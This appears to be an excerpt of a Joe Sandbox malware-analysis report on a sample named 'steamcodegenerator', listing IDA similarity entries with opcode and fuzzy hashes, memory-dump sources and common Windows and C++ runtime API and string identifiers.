                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_22af4e10000_steamcodegenerator.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 75c19430ad9555f9ce9cd9ae4dcbb2ad4329e1d612567e8c7bcd07260438a972
                                                                        • Instruction ID: ebf9b5f8bd18b25826a7cb69aad7ccda38086e16fa65d626eb8fe3e6e437439d
                                                                        • Opcode Fuzzy Hash: 75c19430ad9555f9ce9cd9ae4dcbb2ad4329e1d612567e8c7bcd07260438a972
                                                                        • Instruction Fuzzy Hash: 01A14D31508A0C8FDB55EF68C889BEA77E5FBA8315F10426EE84AC7560EB34D644CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$Value_invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 1500699246-0
                                                                        • Opcode ID: e2ffca55289955cad0152be945083cfc4f4c9dbb8a5636975514020bfa88af06
                                                                        • Instruction ID: ed29dc04142b0fd70811dbcbcb1862ef58ec2d60a6bad632f16ae3460dd2c2a5
                                                                        • Opcode Fuzzy Hash: e2ffca55289955cad0152be945083cfc4f4c9dbb8a5636975514020bfa88af06
                                                                        • Instruction Fuzzy Hash: 21B12472A18646C6EB649F22D8126BA33B0FB81B98F404235DA1DEB7E5DF3CE551C740
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 3215553584-0
                                                                        • Opcode ID: beb85e8a86863ea0d2a3640763483ded5549c817e49d63ce28143ff9a2fe482d
                                                                        • Instruction ID: d0ee81d806150ceab349ab69fdb728395a3d23290bf929f1cc5c02b242569272
                                                                        • Opcode Fuzzy Hash: beb85e8a86863ea0d2a3640763483ded5549c817e49d63ce28143ff9a2fe482d
                                                                        • Instruction Fuzzy Hash: 2A819032B05A55C6EB64CE65D49237D2370FB44BA8F548636EE6EEBB95CF38E0418300
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dd78b8a88bf6096c80a61e6aa1672cbc30d8af44914a7a383a5bb521698ea26c
                                                                        • Instruction ID: 4ad74a15cf65f6a59774f218f5112c34a63b3ed4a521d54cabd22c7a5fb46fe0
                                                                        • Opcode Fuzzy Hash: dd78b8a88bf6096c80a61e6aa1672cbc30d8af44914a7a383a5bb521698ea26c
                                                                        • Instruction Fuzzy Hash: 7B51C4B2A0C78185EB74CB19D44237AA6B1FB457E0F444235DA9E9BB99DF3DF5008B00
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3629964375.0000022AF4E51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000022AF4E51000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_22af4e51000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1c983a2938cf48172002bf867be787710d5e0ba9960fdfd4591bd0f51ee9138b
                                                                        • Instruction ID: f62d258c1bf4544a26f9188ce07b39fb7a1edee2c9af8f91e39391fe98be572f
                                                                        • Opcode Fuzzy Hash: 1c983a2938cf48172002bf867be787710d5e0ba9960fdfd4591bd0f51ee9138b
                                                                        • Instruction Fuzzy Hash: 8D4190317145058FEB0CCE2DD995AA5B3E2FB99304F48C3BDE54BCB69BDA359802CA44
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
                                                                        • Instruction ID: 77af43acad3bd9ad6c2a00015c0a1219597cb831f7cf11df5b58da84dad674fb
                                                                        • Opcode Fuzzy Hash: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
                                                                        • Instruction Fuzzy Hash: EB514D76A18651C6EB248F29D04523937B1EB44B6CF248132CE8DAB795DF3AF853C740
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 45278502b4de115ed76afef2690a2838d0b28876f14c66dd069eb4612fa83dd3
                                                                        • Instruction ID: 824ce28063c557778fd1fee88bcad250971e2ab1094a281fe4953dcfb6b28cfa
                                                                        • Opcode Fuzzy Hash: 45278502b4de115ed76afef2690a2838d0b28876f14c66dd069eb4612fa83dd3
                                                                        • Instruction Fuzzy Hash: 29518F36A18651C6EB648B29C04623D27B0FB54B6CF254132CE4DAB799CF3AF843C780
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
                                                                        • Instruction ID: e4dafa64805235ed9ba111cd20951339da2dd576d244c503101d72d742d0feca
                                                                        • Opcode Fuzzy Hash: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
                                                                        • Instruction Fuzzy Hash: 85515437A18A91C6E7648B29C45127837B1EB45B6CF644132CE4DAB7A5CF3AF853C780
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 485612231-0
                                                                        • Opcode ID: a2c328ef171a7afa6c06a3296587a9b3e14f038aec87a28e036cef878b6331d9
                                                                        • Instruction ID: 6fa966209ecf8a6613dc43d6c22f1602fed03019f06f89b7fa67442ec92ebe35
                                                                        • Opcode Fuzzy Hash: a2c328ef171a7afa6c06a3296587a9b3e14f038aec87a28e036cef878b6331d9
                                                                        • Instruction Fuzzy Hash: DF41C272B14A5582EF44CF2AD91656A63B1BB49FD4B49E032DE0DEBB58DF3CE1428340
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d23d0e9da3076ad5b774ad45d8636280020e110bd3dbb24153443ce06125473
                                                                        • Instruction ID: 2e4dcc212ca93cb6d3e48ff3fe93291ed3d70909658cda96b26b0b750032d9ea
                                                                        • Opcode Fuzzy Hash: 1d23d0e9da3076ad5b774ad45d8636280020e110bd3dbb24153443ce06125473
                                                                        • Instruction Fuzzy Hash: BCF06271B18295CADBA58F29A84766977F0F708384F80D439DA8DC7F14DA3C90608F04
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c20acefe3a69058f9053b966004725b6699a124ed001c4cc8db5546ddce4a23b
                                                                        • Instruction ID: 0daf21cea3ca885201ab8c41313322909df58172519fba11a6c4257a9d36e37a
                                                                        • Opcode Fuzzy Hash: c20acefe3a69058f9053b966004725b6699a124ed001c4cc8db5546ddce4a23b
                                                                        • Instruction Fuzzy Hash: 6FA0026590CD12D0E74C9B02ED630306770FF51310B400031E41DEB2B29F3CA454E304
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                        • API String ID: 459529453-1866435925
                                                                        • Opcode ID: 3937cb2de45063989f30ed65fb080d1dae6c25b6e2d9b3e18489dfea4281ca75
                                                                        • Instruction ID: 4d76e72706907d1ddac3efc94115edf2b6a62168b3db21cc1c1e19264703f3a0
                                                                        • Opcode Fuzzy Hash: 3937cb2de45063989f30ed65fb080d1dae6c25b6e2d9b3e18489dfea4281ca75
                                                                        • Instruction Fuzzy Hash: CBB16C22A09B85C5EB28CB25E4863B973B0FB84B84F548136DE4DAB796DF3CE455C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                        • String ID: bad locale name$false$true
                                                                        • API String ID: 4121308752-1062449267
                                                                        • Opcode ID: a0846c2aa12d742fa10dac8f3bd10f58a2c9fa8587503aeb1b9c9460052203b9
                                                                        • Instruction ID: 9578e4c09a9d54d1619a93331d450cff716a7b0e23b50a246e7f10dcd980575f
                                                                        • Opcode Fuzzy Hash: a0846c2aa12d742fa10dac8f3bd10f58a2c9fa8587503aeb1b9c9460052203b9
                                                                        • Instruction Fuzzy Hash: C1616B32A0A741CAEB19DF60E4522BC37B0AF54744F144534DA8DBBBA6EF38E565D340
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                        • String ID: csm$csm$csm
                                                                        • API String ID: 849930591-393685449
                                                                        • Opcode ID: a990464a9b0ebae1c73dc8e44a8328145eb2f0c0011acfcadcc99229f563dc94
                                                                        • Instruction ID: b7b2cd2148c9cc591a6667abe5b997859ca289650291e60935e7e66b7f9db1d4
                                                                        • Opcode Fuzzy Hash: a990464a9b0ebae1c73dc8e44a8328145eb2f0c0011acfcadcc99229f563dc94
                                                                        • Instruction Fuzzy Hash: 83D18172A08742C6EB68AF65D4823AD77B4FB45788F104135DE8DABB56DF38E4A1C700
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,?,?,?,00007FF66355217D,?,?,?,?,00007FF663546424,?,?,?,00007FF663544660), ref: 00007FF66355B570
                                                                        • GetProcAddress.KERNEL32(?,?,?,?,00007FF66355217D,?,?,?,?,00007FF663546424,?,?,?,00007FF663544660), ref: 00007FF66355B57C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: AddressFreeLibraryProc
                                                                        • String ID: api-ms-$ext-ms-
                                                                        • API String ID: 3013587201-537541572
                                                                        • Opcode ID: 485021a0a37bf4d08527970241f82041fbd12763ed629b207983ccd9ca274b15
                                                                        • Instruction ID: 3c68d1e0037a381657f0222c202618a51760aa04e7ffafec2d896a5591bac139
                                                                        • Opcode Fuzzy Hash: 485021a0a37bf4d08527970241f82041fbd12763ed629b207983ccd9ca274b15
                                                                        • Instruction Fuzzy Hash: 0741CF31B19A42C2EA1AAB17E84967623B5FF05BA0F584635DD0EEF794EE3CF4058300
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID: f$p$p
                                                                        • API String ID: 3215553584-1995029353
                                                                        • Opcode ID: c526f3c0768fe9bb32e6b0cf3c5b34720bc9ff458adbcfce366da728eaeb86fb
                                                                        • Instruction ID: b842d8cd792f3d1a21f92536cce50c0c6de074dd22debefbffd2502ae06c63ff
                                                                        • Opcode Fuzzy Hash: c526f3c0768fe9bb32e6b0cf3c5b34720bc9ff458adbcfce366da728eaeb86fb
                                                                        • Instruction Fuzzy Hash: C9128E72F29153C6FB20AE14E05667D76B1EB507A0F844035E69AAB7C4DF3CF9808B02
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 3215553584-0
                                                                        • Opcode ID: 0bb0a586f61f888d0fabcc55a92c509517cdfc5ef6cb14ed48e5264dfe45f05a
                                                                        • Instruction ID: a24cd7f5e71aad3a18504f09bb893eb61fd61b3c1854936a1c6ab873590c05b3
                                                                        • Opcode Fuzzy Hash: 0bb0a586f61f888d0fabcc55a92c509517cdfc5ef6cb14ed48e5264dfe45f05a
                                                                        • Instruction Fuzzy Hash: E6C1E132A0C786D1EB619B1590422FD3BB1FB81BA0F556135EA8EAB391DF7CF8558340
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF66354E53E,?,?,?,00007FF66354E230,?,?,?,00007FF66354AE11), ref: 00007FF66354E311
                                                                        • GetLastError.KERNEL32(?,?,?,00007FF66354E53E,?,?,?,00007FF66354E230,?,?,?,00007FF66354AE11), ref: 00007FF66354E31F
                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF66354E53E,?,?,?,00007FF66354E230,?,?,?,00007FF66354AE11), ref: 00007FF66354E349
                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF66354E53E,?,?,?,00007FF66354E230,?,?,?,00007FF66354AE11), ref: 00007FF66354E3B7
                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF66354E53E,?,?,?,00007FF66354E230,?,?,?,00007FF66354AE11), ref: 00007FF66354E3C3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                        • String ID: api-ms-
                                                                        • API String ID: 2559590344-2084034818
                                                                        • Opcode ID: 3e1fd3a685f2033975e74a960ce108ae537942f5f0739880e328c386ea771c15
                                                                        • Instruction ID: 4ef2cbc4b0cd494c272390ecafaa17a5ca7bde1c3d4fe9b858123368b6488327
                                                                        • Opcode Fuzzy Hash: 3e1fd3a685f2033975e74a960ce108ae537942f5f0739880e328c386ea771c15
                                                                        • Instruction Fuzzy Hash: BC31B221B1A642D1EE6AEB12A40257963B4FF25BA0F592535DD1DAF792FF3CF4508300
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                        • String ID: invalid string position$@F
                                                                        • API String ID: 593203224-3046666360
                                                                        • Opcode ID: 4a0e63c30155dbd531933714e4fb3250fae38a20e05bdf120d2de5344a78d97b
                                                                        • Instruction ID: b7bddaf1061431b317f1c29a94c92480c00c4a84e4021f9eac0d00d8d532efd6
                                                                        • Opcode Fuzzy Hash: 4a0e63c30155dbd531933714e4fb3250fae38a20e05bdf120d2de5344a78d97b
                                                                        • Instruction Fuzzy Hash: 77318162A08B42C5EA29DF15E4422B973B0FF94B84F580031DA4DAB76ADE3CF462C740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Value$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 2506987500-0
                                                                        • Opcode ID: 1be884a4e317a723df3c05ed33de2d7cd5181bc24a5a1d7764a1952c9c9cbb42
                                                                        • Instruction ID: 709143d5db58cb089dc387e681dbf770eac1965b0db71ac644b35a4a106ba2cf
                                                                        • Opcode Fuzzy Hash: 1be884a4e317a723df3c05ed33de2d7cd5181bc24a5a1d7764a1952c9c9cbb42
                                                                        • Instruction Fuzzy Hash: 63217930E0C642C6FA596772964713D12B2AF487B4F144634EC2EEF7D6EE2CB4028311
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                        • String ID: CONOUT$
                                                                        • API String ID: 3230265001-3130406586
                                                                        • Opcode ID: 694d1561b49bf98eabe73384ab34ca1d62e8bc3aa0c95dc252714f74f68b0a54
                                                                        • Instruction ID: 3ba73fb35f6458cc6c33ed4a07f7d852af2702a179b1a38d0175318360082e2c
                                                                        • Opcode Fuzzy Hash: 694d1561b49bf98eabe73384ab34ca1d62e8bc3aa0c95dc252714f74f68b0a54
                                                                        • Instruction Fuzzy Hash: B9116731B18A42C6E7509B03B84632967B4FB89BE4F144234EA6DDB7A4DF7CE8488740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
